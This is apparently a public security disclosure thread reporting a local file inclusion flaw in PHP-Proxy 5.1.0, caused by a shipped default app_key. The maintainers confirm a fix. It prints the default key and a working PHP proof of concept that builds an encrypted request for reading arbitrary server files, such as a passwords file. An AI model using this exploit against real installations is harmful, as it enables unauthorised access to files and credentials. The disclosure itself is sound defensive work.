PHP-Proxy 5.1.0 - Local File Inclusion (LFI) Vulnerability (on default pre-installed version)

[ameerpornillos]

Brief description of this vulnerability:

Downloadable pre-installed version of PHP-Proxy 5.1.0 (current as of this posting day) from www.php-proxy.com (https://www.php-proxy.com/download/php-proxy.zip) make use of a default app_key wherein can be used for local file inclusion attacks. This can be used to generate encrypted string which can gain access to arbitrary local files in the server. (example: http://php-proxy-site/php-proxy/index.php?q=<encrypted_string_value>)

Affected Version:

5.1.0 (pre-installed version)

Reason of this vulnerability:

The downloadable pre-installed version of PHP-Proxy 5.1.0 (current pre-installed version as of this posting day) from www.php-proxy.com (https://www.php-proxy.com/download/php-proxy.zip) already contains the default app_key in config.php file which might be used by several users using the application thus is vulnerable to local file inclusion.

//default app_key from config.php file
$config['app_key'] = 'aeb067ca0aa9a3193dce3a7264c90187';

Encrypted URL value lies on the app_key as seen on a snippet of code below.

//encryption function of the application
$url = str_rot_pass($url, $key);

Wherein which the key is the encryption_key and by default, its value depends on the md5 hash of app_key and the visiting IP address.

//encryption_key depends on which default url_mode is set to 2 depends on the md5 hash of the app_key and IP address
Config::set('encryption_key', md5(Config::get('app_key').$_SERVER['REMOTE_ADDR']));

Combining all the functions above, an encrypted URL can be generated which contains the local file inclusion vulnerability payload.

Proof of Concept:

Code below will output an encrypted string which can exploit the local file inclusion vulnerability. Add the encrypted string on the PHP-Proxy 5.1.0 application URL: example: http://192.168.0.130/php-proxy/index.php?q=<encrypted_string_value> (replace <encrypted_string_value> with the generated encrypted string value)

<?php
$file = "file:///C:/xampp/passwords.txt"; //example target file to read
$ip = "192.168.0.1"; //change depending on your IP address that access the app
$app_key = "aeb067ca0aa9a3193dce3a7264c90187";
$key = md5($app_key.$ip);
function str_rot_pass($str, $key, $decrypt = false){
    $key_len = strlen($key);
    $result = str_repeat(' ', strlen($str));
    for($i=0; $i<strlen($str); $i++){
        if($decrypt){
            $ascii = ord($str[$i]) - ord($key[$i % $key_len]);
        } else {
            $ascii = ord($str[$i]) + ord($key[$i % $key_len]);
        }
        $result[$i] = chr($ascii);
    }
    return $result;
}
function base64_url_encode($input){
    return rtrim(strtr(base64_encode($input), '+/', '-_'), '=');
}
echo base64_url_encode(str_rot_pass($file, $key));
?>

Below screenshot is an example of gaining an encrypted URL string within which used to read the C:/xampp/passwords.txt of the server.

Impact:

Gain access to arbitrary local files in the server.

Suggested Mitigation:

There is already a setup.txt included on the downloadable pre-installed version of PHP-Proxy which will generate and overwrite the default app_key, however users most probably don't use it and kept on using the default app_key.

Possible mitigation is make the app_key value in the config.php blank and make users just make use of the setup.txt to generate and overwrite the default app_key.

[Benji-Collins]

Thanks for pointing this out. There are probably quite a few installs affected by this.

Another possible fix is to leave the app_key value blank and make the proxy throw an error (and not search) if it is not changed (in the same style that other search related errors are shown, above the URL bar).

[Athlon1600]

Fixed.
A preinstalled version of php-proxy that exists here:

https://www.php-proxy.com/download/php-proxy.zip

will no longer include app_key by default, and will have to be generated manually by the user or else they get:

app_key inside config.php cannot be empty!